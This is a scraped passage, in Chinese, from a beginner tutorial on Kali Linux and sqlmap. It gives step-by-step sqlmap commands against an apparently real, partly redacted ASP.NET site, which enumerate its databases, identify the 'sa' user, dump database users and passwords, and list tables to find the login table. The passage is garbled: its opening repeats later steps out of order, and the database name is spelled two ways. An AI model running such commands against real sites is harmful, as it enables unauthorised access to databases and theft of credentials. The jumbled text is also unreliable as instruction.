如何安装kali虚拟机:十一 网络安全.虚拟机VMware Kali安装入门及Sqlmap基本用法
如何安装kali虚拟机:十一 网络安全.虚拟机VMware Kali安装入门及Sqlmap基本用法第七步:获取数据库所有表。sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords运行结果如下图所示,获取数据库用户和密码。第五步:获取数据库当前用户。sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user运行结果如下图所示,获取当前数据库用户sa。第六步:获取数据库所有用户和密码。
第三步:获取所有数据库。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --dbs
运行结果如下图所示,获取9个数据库,其中–dbs参数表示databases。
第四步:获取当前数据库。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-db
运行结果如下图所示,获取9个数据库。其中–current-db参数表示当前数据库,相当于前文MSSQL的db_name()获取数据库字段。输出结果:akykd_new。
第五步:获取数据库当前用户。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user
运行结果如下图所示,获取当前数据库用户sa。
第六步:获取数据库所有用户和密码。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords
运行结果如下图所示,获取数据库用户和密码。
第七步:获取数据库所有表。
sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new --tables
运行结果如下图所示,获取数据库ahykd_new的所有表,其中-D表示数据库,–tables表示所有表。
通过人为猜解,知道登录表位usr。